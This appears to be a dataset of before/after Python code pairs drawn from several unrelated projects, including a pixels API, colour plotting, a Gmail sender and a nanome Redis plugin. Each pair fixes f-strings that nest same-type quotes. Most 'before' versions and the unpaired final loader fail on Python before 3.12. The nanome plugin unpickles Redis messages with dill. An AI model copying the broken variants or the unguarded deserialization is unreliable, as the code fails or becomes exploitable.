headers = {"Authorization": f"Bearer {token}"}
r = requests.get(
"https://pixels.pythondiscord.com/pixel",
headers=headers,
# Note: We're using query parameters to pass the coordinates, not the request body:
params={
"x": 87,
"y": 69
}
)
print("Here's the colour of the pixel:", r.json()["rgb"])
```
"""
if x >= Sizes.WIDTH or y >= Sizes.HEIGHT:
raise HTTPException(400, "Pixel is out of the canvas bounds.")
pixel_data = await request.state.canvas.get_pixel(x, y)
return Pixel(x=x, y=y, rgb=''.join(f"{x:02x}" for x in pixel_data))
@secure.put("/pixel", response_model=Message)
@ratelimits.UserRedis(
requests=Ratelimits.PUT_PIXEL_AMOUNT,
time_unit=Ratelimits.PUT_PIXEL_RATE_LIMIT,
cooldown=Ratelimits.PUT_PIXEL_RATE_COOLDOWN
)
async def put_pixel(request: Request, pixel: Pixel) -> Message:
"""
Override the pixel at the specified coordinate with the specified color.
This endpoint requires an authentication token.
See [this page](https://pixels.pythondiscord.com/info/authentication)
for how to authenticate with the API.
#### Example Python Script
```py
from dotenv import load_dotenv
from os import getenv
import requests
load_dotenv(".env")
token = getenv("TOKEN")
headers = {"Authorization": f"Bearer {token}"}
data = {
"x": 80,
"y": 45,
"rgb": "00FF00"
}
# Remember, this is a PUT method.
r = requests.put(
"https://pixels.pythondiscord.com/pixel",
# Request body this time:
json=data,
headers=headers,
)
payload = r.json()
print(f"We got a message back! {payload["message"]}")
```
"""
log.info(f"{request.state.user_id} is setting {pixel.x}, {pixel.y} to {pixel.rgb}")
await request.state.canvas.set_pixel(request.state.db_conn, pixel.x, pixel.y, pixel.rgb, request.state.user_id)
return Message(message=f"Set pixel at x={pixel.x},y={pixel.y} to color {pixel.rgb}.")
router.include_router(secure)
| import logging
from fastapi import APIRouter, Depends, HTTPException, Request, Response
from pixels.constants import Ratelimits, Sizes
from pixels.models import GetSize, Message, Pixel
from pixels.utils import auth, ratelimits
log = logging.getLogger(__name__)
# By only adding the JWT dependency to the submounted router we can have size() be un-authenticated
router = APIRouter(prefix="/canvas", tags=["Canvas Endpoints"])
# We include this at the bottom
secure = APIRouter(dependencies=[Depends(auth.JWTBearer())])
@router.get("/size", response_model=GetSize)
async def size() -> GetSize:
"""
Get the size of the Pixels canvas.
You can use the data this endpoint returns to build some cool scripts
that can start the ducky uprising on the canvas!
This endpoint doesn't require any authentication so don't worry
about the headers usually required.
#### Example Python Script
```py
import requests
r = requests.get("https://pixels.pythondiscord.com/size")
payload = r.json()
canvas_height = payload["height"]
canvas_width = payload["width"]
print(f"We got our canvas size! Height: {canvas_height}, Width: {canvas_width}.")
```
"""
return GetSize(width=Sizes.WIDTH, height=Sizes.HEIGHT)
@secure.get("/pixels", response_class=Response, responses={
200: {
"description": "Successful Response.",
"content": {
"application/octet-stream": {
"schema": {
"type": "application/octet-stream",
"format": "binary"
}
}
}
}
})
@ratelimits.UserRedis(
requests=Ratelimits.GET_PIXELS_AMOUNT,
time_unit=Ratelimits.GET_PIXELS_RATE_LIMIT,
cooldown=Ratelimits.GET_PIXELS_RATE_COOLDOWN
)
async def canvas_pixels(request: Request) -> Response:
"""
Get the current state of all pixels from the canvas.
This endpoint requires an authentication token.
See [this page](https://pixels.pythondiscord.com/info/authentication)
for how to authenticate with the API.
#### Example Python Script
```py
from dotenv import load_dotenv
from os import getenv
import requests
load_dotenv(".env")
token = getenv("TOKEN")
headers = {"Authorization": f"Bearer {token}"}
r = requests.get("https://pixels.pythondiscord.com/pixels", headers=headers)
data = r.content
# have fun processing the returned data...
```
"""
return Response(
await request.state.canvas.get_pixels(),
media_type="application/octet-stream"
)
@secure.get("/pixel", response_model=Pixel)
@ratelimits.UserRedis(
requests=Ratelimits.GET_PIXEL_AMOUNT,
time_unit=Ratelimits.GET_PIXEL_RATE_LIMIT,
cooldown=Ratelimits.GET_PIXEL_RATE_COOLDOWN
)
async def get_pixel(x: int, y: int, request: Request) -> Pixel:
"""
Get a single pixel given the x and y coordinates.
This endpoint requires an authentication token.
See [this page](https://pixels.pythondiscord.com/info/authentication)
for how to authenticate with the API.
#### Example Python Script
```py
from dotenv import load_dotenv
from os import getenv
import requests
load_dotenv(".env")
token = getenv("TOKEN")
headers = {"Authorization": f"Bearer {token}"}
r = requests.get(
"https://pixels.pythondiscord.com/pixel",
headers=headers,
# Note: We're using query parameters to pass the coordinates, not the request body:
params={
"x": 87,
"y": 69
}
)
print("Here's the colour of the pixel:", r.json()["rgb"])
```
"""
if x >= Sizes.WIDTH or y >= Sizes.HEIGHT:
raise HTTPException(400, "Pixel is out of the canvas bounds.")
pixel_data = await request.state.canvas.get_pixel(x, y)
return Pixel(x=x, y=y, rgb=''.join(f"{x:02x}" for x in pixel_data))
@secure.put("/pixel", response_model=Message)
@ratelimits.UserRedis(
requests=Ratelimits.PUT_PIXEL_AMOUNT,
time_unit=Ratelimits.PUT_PIXEL_RATE_LIMIT,
cooldown=Ratelimits.PUT_PIXEL_RATE_COOLDOWN
)
async def put_pixel(request: Request, pixel: Pixel) -> Message:
"""
Override the pixel at the specified coordinate with the specified color.
This endpoint requires an authentication token.
See [this page](https://pixels.pythondiscord.com/info/authentication)
for how to authenticate with the API.
#### Example Python Script
```py
from dotenv import load_dotenv
from os import getenv
import requests
load_dotenv(".env")
token = getenv("TOKEN")
headers = {"Authorization": f"Bearer {token}"}
data = {
"x": 80,
"y": 45,
"rgb": "00FF00"
}
# Remember, this is a PUT method.
r = requests.put(
"https://pixels.pythondiscord.com/pixel",
# Request body this time:
json=data,
headers=headers,
)
payload = r.json()
print(f"We got a message back! {payload['message']}")
```
"""
log.info(f"{request.state.user_id} is setting {pixel.x}, {pixel.y} to {pixel.rgb}")
await request.state.canvas.set_pixel(request.state.db_conn, pixel.x, pixel.y, pixel.rgb, request.state.user_id)
return Message(message=f"Set pixel at x={pixel.x},y={pixel.y} to color {pixel.rgb}.")
router.include_router(secure)
|
"""
Characterisation Plotting
=========================
Defines the characterisation plotting objects:
- :func:`colour.plotting.plot_single_colour_checker`
- :func:`colour.plotting.plot_multi_colour_checkers`
"""
from __future__ import annotations
import numpy as np
import matplotlib.pyplot as plt
from colour.hints import Any, Dict, Sequence, Tuple, Union
from colour.characterisation import ColourChecker
from colour.models import xyY_to_XYZ
from colour.plotting import (
CONSTANTS_COLOUR_STYLE,
ColourSwatch,
XYZ_to_plotting_colourspace,
artist,
filter_colour_checkers,
plot_multi_colour_swatches,
override_style,
render,
)
from colour.utilities import attest
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"plot_single_colour_checker",
"plot_multi_colour_checkers",
]
@override_style(
**{
"axes.grid": False,
"xtick.bottom": False,
"ytick.left": False,
"xtick.labelbottom": False,
"ytick.labelleft": False,
}
)
def plot_single_colour_checker(
colour_checker: Union[
ColourChecker, str
] = "ColorChecker24 - After November 2014",
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given colour checker.
Parameters
----------
colour_checker
Color checker to plot. ``colour_checker`` can be of any type or form
supported by the
:func:`colour.plotting.filter_colour_checkers` definition.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_colour_swatches`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_single_colour_checker('ColorChecker 2005') # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...AxesSubplot...>)
.. image:: ../_static/Plotting_Plot_Single_Colour_Checker.png
:align: center
:alt: plot_single_colour_checker
"""
return plot_multi_colour_checkers([colour_checker], **kwargs)
@override_style(
**{
"axes.grid": False,
"xtick.bottom": False,
"ytick.left": False,
"xtick.labelbottom": False,
"ytick.labelleft": False,
}
)
def plot_multi_colour_checkers(
colour_checkers: Union[
ColourChecker, str, Sequence[Union[ColourChecker, str]]
],
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot and compares given colour checkers.
Parameters
----------
colour_checkers
Color checker to plot, count must be less than or equal to 2.
``colour_checkers`` elements can be of any type or form supported by
the :func:`colour.plotting.filter_colour_checkers` definition.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_colour_swatches`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_multi_colour_checkers(['ColorChecker 1976', 'ColorChecker 2005'])
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...AxesSubplot...>)
.. image:: ../_static/Plotting_Plot_Multi_Colour_Checkers.png
:align: center
:alt: plot_multi_colour_checkers
"""
filtered_colour_checkers = list(
filter_colour_checkers(colour_checkers).values()
)
attest(
len(filtered_colour_checkers) <= 2,
"Only two colour checkers can be compared at a time!",
)
_figure, axes = artist(**kwargs)
compare_swatches = len(filtered_colour_checkers) == 2
colour_swatches = []
colour_checker_names = []
for colour_checker in filtered_colour_checkers:
colour_checker_names.append(colour_checker.name)
for label, xyY in colour_checker.data.items():
XYZ = xyY_to_XYZ(xyY)
RGB = XYZ_to_plotting_colourspace(XYZ, colour_checker.illuminant)
colour_swatches.append(
ColourSwatch(np.clip(np.ravel(RGB), 0, 1), label.title())
)
if compare_swatches:
colour_swatches = [
swatch
for pairs in zip(
colour_swatches[0 : len(colour_swatches) // 2],
colour_swatches[len(colour_swatches) // 2 :],
)
for swatch in pairs
]
background_colour = "0.1"
width = height = 1.0
spacing = 0.25
columns = 6
settings: Dict[str, Any] = {
"axes": axes,
"width": width,
"height": height,
"spacing": spacing,
"columns": columns,
"direction": "-y",
"text_kwargs": {"size": 8},
"background_colour": background_colour,
"compare_swatches": "Stacked" if compare_swatches else None,
}
settings.update(kwargs)
settings["standalone"] = False
plot_multi_colour_swatches(colour_swatches, **settings)
axes.text(
0.5,
0.005,
(
f"{", ".join(colour_checker_names)} - "
f"{CONSTANTS_COLOUR_STYLE.colour.colourspace.name} - "
f"Colour Rendition Chart"
),
transform=axes.transAxes,
color=CONSTANTS_COLOUR_STYLE.colour.bright,
ha="center",
va="bottom",
zorder=CONSTANTS_COLOUR_STYLE.zorder.midground_label,
)
settings.update(
{
"axes": axes,
"standalone": True,
"title": ", ".join(colour_checker_names),
}
)
settings.update(kwargs)
return render(**settings)
| """
Characterisation Plotting
=========================
Defines the characterisation plotting objects:
- :func:`colour.plotting.plot_single_colour_checker`
- :func:`colour.plotting.plot_multi_colour_checkers`
"""
from __future__ import annotations
import numpy as np
import matplotlib.pyplot as plt
from colour.hints import Any, Dict, Sequence, Tuple, Union
from colour.characterisation import ColourChecker
from colour.models import xyY_to_XYZ
from colour.plotting import (
CONSTANTS_COLOUR_STYLE,
ColourSwatch,
XYZ_to_plotting_colourspace,
artist,
filter_colour_checkers,
plot_multi_colour_swatches,
override_style,
render,
)
from colour.utilities import attest
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"plot_single_colour_checker",
"plot_multi_colour_checkers",
]
@override_style(
**{
"axes.grid": False,
"xtick.bottom": False,
"ytick.left": False,
"xtick.labelbottom": False,
"ytick.labelleft": False,
}
)
def plot_single_colour_checker(
colour_checker: Union[
ColourChecker, str
] = "ColorChecker24 - After November 2014",
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given colour checker.
Parameters
----------
colour_checker
Color checker to plot. ``colour_checker`` can be of any type or form
supported by the
:func:`colour.plotting.filter_colour_checkers` definition.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_colour_swatches`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_single_colour_checker('ColorChecker 2005') # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...AxesSubplot...>)
.. image:: ../_static/Plotting_Plot_Single_Colour_Checker.png
:align: center
:alt: plot_single_colour_checker
"""
return plot_multi_colour_checkers([colour_checker], **kwargs)
@override_style(
**{
"axes.grid": False,
"xtick.bottom": False,
"ytick.left": False,
"xtick.labelbottom": False,
"ytick.labelleft": False,
}
)
def plot_multi_colour_checkers(
colour_checkers: Union[
ColourChecker, str, Sequence[Union[ColourChecker, str]]
],
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot and compares given colour checkers.
Parameters
----------
colour_checkers
Color checker to plot, count must be less than or equal to 2.
``colour_checkers`` elements can be of any type or form supported by
the :func:`colour.plotting.filter_colour_checkers` definition.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_colour_swatches`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_multi_colour_checkers(['ColorChecker 1976', 'ColorChecker 2005'])
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...AxesSubplot...>)
.. image:: ../_static/Plotting_Plot_Multi_Colour_Checkers.png
:align: center
:alt: plot_multi_colour_checkers
"""
filtered_colour_checkers = list(
filter_colour_checkers(colour_checkers).values()
)
attest(
len(filtered_colour_checkers) <= 2,
"Only two colour checkers can be compared at a time!",
)
_figure, axes = artist(**kwargs)
compare_swatches = len(filtered_colour_checkers) == 2
colour_swatches = []
colour_checker_names = []
for colour_checker in filtered_colour_checkers:
colour_checker_names.append(colour_checker.name)
for label, xyY in colour_checker.data.items():
XYZ = xyY_to_XYZ(xyY)
RGB = XYZ_to_plotting_colourspace(XYZ, colour_checker.illuminant)
colour_swatches.append(
ColourSwatch(np.clip(np.ravel(RGB), 0, 1), label.title())
)
if compare_swatches:
colour_swatches = [
swatch
for pairs in zip(
colour_swatches[0 : len(colour_swatches) // 2],
colour_swatches[len(colour_swatches) // 2 :],
)
for swatch in pairs
]
background_colour = "0.1"
width = height = 1.0
spacing = 0.25
columns = 6
settings: Dict[str, Any] = {
"axes": axes,
"width": width,
"height": height,
"spacing": spacing,
"columns": columns,
"direction": "-y",
"text_kwargs": {"size": 8},
"background_colour": background_colour,
"compare_swatches": "Stacked" if compare_swatches else None,
}
settings.update(kwargs)
settings["standalone"] = False
plot_multi_colour_swatches(colour_swatches, **settings)
axes.text(
0.5,
0.005,
(
f"{', '.join(colour_checker_names)} - "
f"{CONSTANTS_COLOUR_STYLE.colour.colourspace.name} - "
f"Colour Rendition Chart"
),
transform=axes.transAxes,
color=CONSTANTS_COLOUR_STYLE.colour.bright,
ha="center",
va="bottom",
zorder=CONSTANTS_COLOUR_STYLE.zorder.midground_label,
)
settings.update(
{
"axes": axes,
"standalone": True,
"title": ", ".join(colour_checker_names),
}
)
settings.update(kwargs)
return render(**settings)
|
import base64
from apiclient import errors
from googleapiclient.discovery import build
from httplib2 import Http
from oauth2client import file, client, tools
from parsons.notifications.sendmail import SendMail
SCOPES = 'https://www.googleapis.com/auth/gmail.send'
class Gmail(SendMail):
"""Create a Gmail object, for sending emails.
`Args:`
creds_path: str
The path to the credentials.json file.
token_path: str
The path to the token.json file.
user_id: str
Optional; Sender email address. Defaults to the special value
"me" which is used to indicate the authenticated user.
"""
def __init__(self, creds_path=None, token_path=None, user_id='me'):
self.user_id = user_id
if not creds_path:
raise ValueError("Invalid path to credentials.json.")
if not token_path:
raise ValueError("Invalid path to token.json.")
self.store = file.Storage(token_path)
self.creds = self.store.get()
# BUG-1
# http = httplib2shim.Http()
if not self.creds or self.creds.invalid:
flow = client.flow_from_clientsecrets(creds_path, SCOPES)
self.creds = tools.run_flow(flow, self.store)
# BUG-1
# self.creds = self.run_flow(flow, self.store, http=http)
self.service = build('gmail', 'v1', http=self.creds.authorize(Http()))
# BUG-1
# self.service = build('gmail', 'v1', http=self.creds.authorize(http))
def _encode_raw_message(self, message):
return {'raw': base64.urlsafe_b64encode(message.as_bytes()).decode()}
def _send_message(self, msg):
"""Send an email message.
`Args:`
message: dict
Message to be sent as a base64url encode object.
i.e. the objects created by the create_* instance methods
`Returns:`
dict
A Users.messages object see `https://developers.google.com/gmail/api/v1/reference/users/messages#resource.` # noqa
for more info.
"""
self.log.info("Sending a message...")
message = self._encode_raw_message(msg)
self.log.debug(message)
try:
message = (self.service.users().messages()
.send(userId=self.user_id, body=message).execute())
except errors.HttpError:
self.log.exception(
'An error occurred: while attempting to send a message.')
raise
else:
self.log.debug(message)
self.log.info(
f"Message sent succesfully (Message Id: {message["id"]})")
return message
| import base64
from apiclient import errors
from googleapiclient.discovery import build
from httplib2 import Http
from oauth2client import file, client, tools
from parsons.notifications.sendmail import SendMail
SCOPES = 'https://www.googleapis.com/auth/gmail.send'
class Gmail(SendMail):
"""Create a Gmail object, for sending emails.
`Args:`
creds_path: str
The path to the credentials.json file.
token_path: str
The path to the token.json file.
user_id: str
Optional; Sender email address. Defaults to the special value
"me" which is used to indicate the authenticated user.
"""
def __init__(self, creds_path=None, token_path=None, user_id='me'):
self.user_id = user_id
if not creds_path:
raise ValueError("Invalid path to credentials.json.")
if not token_path:
raise ValueError("Invalid path to token.json.")
self.store = file.Storage(token_path)
self.creds = self.store.get()
# BUG-1
# http = httplib2shim.Http()
if not self.creds or self.creds.invalid:
flow = client.flow_from_clientsecrets(creds_path, SCOPES)
self.creds = tools.run_flow(flow, self.store)
# BUG-1
# self.creds = self.run_flow(flow, self.store, http=http)
self.service = build('gmail', 'v1', http=self.creds.authorize(Http()))
# BUG-1
# self.service = build('gmail', 'v1', http=self.creds.authorize(http))
def _encode_raw_message(self, message):
return {'raw': base64.urlsafe_b64encode(message.as_bytes()).decode()}
def _send_message(self, msg):
"""Send an email message.
`Args:`
message: dict
Message to be sent as a base64url encode object.
i.e. the objects created by the create_* instance methods
`Returns:`
dict
A Users.messages object see `https://developers.google.com/gmail/api/v1/reference/users/messages#resource.` # noqa
for more info.
"""
self.log.info("Sending a message...")
message = self._encode_raw_message(msg)
self.log.debug(message)
try:
message = (self.service.users().messages()
.send(userId=self.user_id, body=message).execute())
except errors.HttpError:
self.log.exception(
'An error occurred: while attempting to send a message.')
raise
else:
self.log.debug(message)
self.log.info(
f"Message sent succesfully (Message Id: {message['id']})")
return message
|
import os
# You need to replace the next values with the appropriate values for your configuration
basedir = os.path.abspath(os.path.dirname(__file__))
SQLALCHEMY_ECHO = False
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_DATABASE_URI = f"sqlite:///{os.path.join(basedir, "data", "zip.db")}" | import os
# You need to replace the next values with the appropriate values for your configuration
basedir = os.path.abspath(os.path.dirname(__file__))
SQLALCHEMY_ECHO = False
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_DATABASE_URI = f"sqlite:///{os.path.join(basedir, 'data', 'zip.db')}" |
import base64
import dill
import io
import json
import os
import redis
import struct
import sys
import uuid
import nanome
from nanome.util import async_callback, Logs
from nanome.util.enums import NotificationTypes
BASE_PATH = os.path.dirname(f'{os.path.realpath(__file__)}')
MENU_PATH = os.path.join(BASE_PATH, 'default_menu.json')
REDIS_HOST = os.environ.get('REDIS_HOST')
REDIS_PORT = os.environ.get('REDIS_PORT')
REDIS_PASSWORD = os.environ.get('REDIS_PASSWORD')
class PluginService(nanome.AsyncPluginInstance):
@async_callback
async def start(self):
# Create Redis channel name to send to frontend to publish to
permanent_channel = os.environ.get('PERMANENT_CHANNEL')
self.redis_channel = permanent_channel if permanent_channel else str(uuid.uuid4())
Logs.message(f"Starting {self.__class__.__name__} on Redis Channel {self.redis_channel}")
# We need to increase the recursion limit in order to properly serialize Complexes
recursion_limit = 100000
sys.setrecursionlimit(recursion_limit)
self.streams = []
self.shapes = []
@async_callback
async def on_run(self):
default_url = os.environ.get('DEFAULT_URL')
jupyter_token = os.environ.get('JUPYTER_TOKEN')
url = f'{default_url}?token={jupyter_token}'
print(f'Opening {url}')
self.open_url(url)
await self.poll_redis_for_requests(self.redis_channel)
@async_callback
async def poll_redis_for_requests(self, redis_channel):
"""Start a non-halting loop polling for and processing Plugin Requests.
Subscribe to provided redis channel, and process any requests received.
"""
rds = redis.Redis(
host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD,
decode_responses=True)
pubsub = rds.pubsub(ignore_subscribe_messages=True)
pubsub.subscribe(redis_channel)
for message in pubsub.listen():
if message.get('type') == 'message':
try:
data = json.loads(message.get('data'))
except json.JSONDecodeError:
error_message = 'JSON Decode Failure'
self.send_notification(NotificationTypes.error, error_message)
Logs.message(f"Received Request: {data.get("function")}")
fn_name = data['function']
args = self.unpickle_data(data['args'])
kwargs = self.unpickle_data(data['kwargs'])
response_channel = data['response_channel']
function_to_call = getattr(self, fn_name)
try:
response = await function_to_call(*args, **kwargs)
except (TypeError, RuntimeError) as e:
# TypeError Happens when you await a non-sync function.
# Because nanome-lib doesn't define functions using `async def`,
# I can't find a reliable way to determine whether we need to await asyncs.
# For now, just recall the function without async.
response = function_to_call(*args, **kwargs)
except struct.error:
Logs.error(f"Serialization error on {fn_name} call")
Logs.message(response)
pickled_response = self.pickle_data(response)
Logs.message(f'Publishing Response to {response_channel}')
rds.publish(response_channel, pickled_response)
@staticmethod
def pickle_data(data):
"""Return the stringified bytes of pickled data."""
bytes_output = io.BytesIO()
dill.dump(data, bytes_output)
bytes_output_base64 = base64.b64encode(bytes_output.getvalue()).decode()
bytes_output.close()
return bytes_output_base64
@staticmethod
def unpickle_data(pickled_data):
"""Unpickle data into its original python version."""
pickle_bytes = io.BytesIO(base64.b64decode(pickled_data))
unpickled_data = dill.loads(pickle_bytes.read())
pickle_bytes.close()
return unpickled_data
async def create_writing_stream(self, indices_list, stream_type, callback=None):
"""After creating stream, save it for future lookups."""
response = await super().create_writing_stream(indices_list, stream_type, callback=callback)
stream, _ = response
if stream:
self.streams.append(stream)
return response
def stream_update(self, stream_id, stream_data):
"""Function to update stream."""
stream = next(strm for strm in self.streams if strm._Stream__id == stream_id)
output = stream.update(stream_data)
return output
def stream_destroy(self, stream_id):
"""Function to destroy stream."""
stream = next(strm for strm in self.streams if strm._Stream__id == stream_id)
output = stream.destroy()
return output
async def upload_shapes(self, shape_list):
for shape in shape_list:
print(shape.index)
response = await nanome.api.shapes.Shape.upload_multiple(shape_list)
self.shapes.extend(response)
for shape in shape_list:
print(shape.index)
return shape_list
| import base64
import dill
import io
import json
import os
import redis
import struct
import sys
import uuid
import nanome
from nanome.util import async_callback, Logs
from nanome.util.enums import NotificationTypes
BASE_PATH = os.path.dirname(f'{os.path.realpath(__file__)}')
MENU_PATH = os.path.join(BASE_PATH, 'default_menu.json')
REDIS_HOST = os.environ.get('REDIS_HOST')
REDIS_PORT = os.environ.get('REDIS_PORT')
REDIS_PASSWORD = os.environ.get('REDIS_PASSWORD')
class PluginService(nanome.AsyncPluginInstance):
@async_callback
async def start(self):
# Create Redis channel name to send to frontend to publish to
permanent_channel = os.environ.get('PERMANENT_CHANNEL')
self.redis_channel = permanent_channel if permanent_channel else str(uuid.uuid4())
Logs.message(f"Starting {self.__class__.__name__} on Redis Channel {self.redis_channel}")
# We need to increase the recursion limit in order to properly serialize Complexes
recursion_limit = 100000
sys.setrecursionlimit(recursion_limit)
self.streams = []
self.shapes = []
@async_callback
async def on_run(self):
default_url = os.environ.get('DEFAULT_URL')
jupyter_token = os.environ.get('JUPYTER_TOKEN')
url = f'{default_url}?token={jupyter_token}'
print(f'Opening {url}')
self.open_url(url)
await self.poll_redis_for_requests(self.redis_channel)
@async_callback
async def poll_redis_for_requests(self, redis_channel):
"""Start a non-halting loop polling for and processing Plugin Requests.
Subscribe to provided redis channel, and process any requests received.
"""
rds = redis.Redis(
host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD,
decode_responses=True)
pubsub = rds.pubsub(ignore_subscribe_messages=True)
pubsub.subscribe(redis_channel)
for message in pubsub.listen():
if message.get('type') == 'message':
try:
data = json.loads(message.get('data'))
except json.JSONDecodeError:
error_message = 'JSON Decode Failure'
self.send_notification(NotificationTypes.error, error_message)
Logs.message(f"Received Request: {data.get('function')}")
fn_name = data['function']
args = self.unpickle_data(data['args'])
kwargs = self.unpickle_data(data['kwargs'])
response_channel = data['response_channel']
function_to_call = getattr(self, fn_name)
try:
response = await function_to_call(*args, **kwargs)
except (TypeError, RuntimeError) as e:
# TypeError Happens when you await a non-sync function.
# Because nanome-lib doesn't define functions using `async def`,
# I can't find a reliable way to determine whether we need to await asyncs.
# For now, just recall the function without async.
response = function_to_call(*args, **kwargs)
except struct.error:
Logs.error(f"Serialization error on {fn_name} call")
Logs.message(response)
pickled_response = self.pickle_data(response)
Logs.message(f'Publishing Response to {response_channel}')
rds.publish(response_channel, pickled_response)
@staticmethod
def pickle_data(data):
"""Return the stringified bytes of pickled data."""
bytes_output = io.BytesIO()
dill.dump(data, bytes_output)
bytes_output_base64 = base64.b64encode(bytes_output.getvalue()).decode()
bytes_output.close()
return bytes_output_base64
@staticmethod
def unpickle_data(pickled_data):
"""Unpickle data into its original python version."""
pickle_bytes = io.BytesIO(base64.b64decode(pickled_data))
unpickled_data = dill.loads(pickle_bytes.read())
pickle_bytes.close()
return unpickled_data
async def create_writing_stream(self, indices_list, stream_type, callback=None):
"""After creating stream, save it for future lookups."""
response = await super().create_writing_stream(indices_list, stream_type, callback=callback)
stream, _ = response
if stream:
self.streams.append(stream)
return response
def stream_update(self, stream_id, stream_data):
"""Function to update stream."""
stream = next(strm for strm in self.streams if strm._Stream__id == stream_id)
output = stream.update(stream_data)
return output
def stream_destroy(self, stream_id):
"""Function to destroy stream."""
stream = next(strm for strm in self.streams if strm._Stream__id == stream_id)
output = stream.destroy()
return output
async def upload_shapes(self, shape_list):
for shape in shape_list:
print(shape.index)
response = await nanome.api.shapes.Shape.upload_multiple(shape_list)
self.shapes.extend(response)
for shape in shape_list:
print(shape.index)
return shape_list
|
import numpy as np
import time
import json
import utils
import torch
from torch.utils.data import Dataset
np.random.seed(0)
DATA_PATH = './data/'
class ToutiaoEntityLinkingDataset(Dataset):
def __init__(self, set_type, opt, char_dict, ent_dict,
is_inference=False, is_pretrain=False):
super().__init__()
self.set_type = set_type
self.domain = opt.domain
self.is_inference = is_inference
self.is_pretrain = is_pretrain
self.instances = []
self.num_comments = []
self.num_mentions = 0
self.char_dict = char_dict
self.ent_dict = ent_dict
self.load_raw_dataset()
def __len__(self):
return len(self.instances)
def __getitem__(self, index):
instance = self.instances[index]
ret_obj = dict(
cmt_text=instance[0],
cand_text=instance[3],
cmt_ids=instance[1],
ment_ind=instance[2],
cand_ent=instance[4],
features=instance[5],
art_ref_ent=instance[6],
label=instance[7],
id=instance[8],
mention_tuple=instance[9],
)
return ret_obj
def collater(self, samples):
"""Convert a list of instances into a batch, do padding for comment"""
def merge(key, is_list=False, pad_idx=0):
if is_list:
res = []
for i in range(len(samples[0][key])):
res.append(utils.collate_tokens(
[s[key][i] for s in samples], pad_idx=pad_idx,
))
return res
else:
return utils.collate_tokens([s[key] for s in samples],
pad_idx=pad_idx)
ret_obj = dict(
id=[s['id'] for s in samples],
comment=merge('cmt_ids', pad_idx=0),
mention_ind=merge('ment_ind', pad_idx=0),
features=merge('features'),
cand_ent=torch.LongTensor([s['cand_ent'] for s in samples]),
art_ref_ent=merge('art_ref_ent'),
labels=torch.FloatTensor([int(s['label']) for s in samples]),
comment_text=[s['cmt_text'] for s in samples],
cand_text=[s['cand_text'] for s in samples],
mention_tuple=[s['mention_tuple'] for s in samples],
)
return ret_obj
def load_raw_dataset(self):
t0 = time.time()
pos_labels = 0
jsonl_path = DATA_PATH + f'{self.domain}_'
if self.is_pretrain:
jsonl_path += 'unlabeled.jsonl'
else:
jsonl_path += 'labeled.jsonl'
art_ref_entity_path = DATA_PATH + f'{self.domain}_art_ref_entity.jsonl'
art_ref_entity = [json.loads(ln) for ln in open(art_ref_entity_path)]
features_path = DATA_PATH + f'features/{self.domain}_labeled.jsonl'
features = [json.loads(ln) for ln in open(features_path)]
for ln_id, ln in enumerate(open(jsonl_path)):
cur_feat = features[ln_id]['comments']
cur_obj = json.loads(ln)
if cur_obj['split'] != self.set_type: continue
self.num_comments.append(len(cur_obj['comments']))
cur_art_ref_entity_ids = [self.ent_dict.word2id(e) for e in art_ref_entity[ln_id]]
for cid, cmt in enumerate(cur_obj['comments']):
cmt_text = cmt['text']
cmt_char_ids = [self.char_dict.word2id(w) for w in cmt['text']]
assert cur_feat[cid]['comment'] == cmt_text
self.num_mentions += len(cmt['mentions'])
for ment_ix, ment in enumerate(cmt['mentions']):
ment_ind = np.zeros([len(cmt_text)], dtype=np.int)
ment_ind[ment['span'][0]: ment['span'][1]] = 1
ment_feat = cur_feat[cid]['features'][ment_ix]
for cand_ix, cand in enumerate(ment['candidates']):
if not cand in ment_feat: continue
cand_id = self.ent_dict.word2id(cand)
instance_feats = ment_feat[cand]
# comment_text, comment_char_ids, mention indicator, candidate_text, candidate_id, features, article_ent, label, id
label = cand in ment['labels']
if label:
pos_labels += 1
instance_id = f'{cur_obj['id']}_{cmt['cid']}_{ment_ix}_{cand_ix}'
cmt_char_ids = torch.LongTensor(cmt_char_ids)
ment_ind = torch.LongTensor(ment_ind)
instance_feats = torch.Tensor(instance_feats)
art_ref_ent = torch.LongTensor(cur_art_ref_entity_ids)
cur_instance = (cmt_text, cmt_char_ids, ment_ind, cand,
cand_id, instance_feats, art_ref_ent, label,
instance_id, (ment['text'], ment['span']))
self.instances.append(cur_instance)
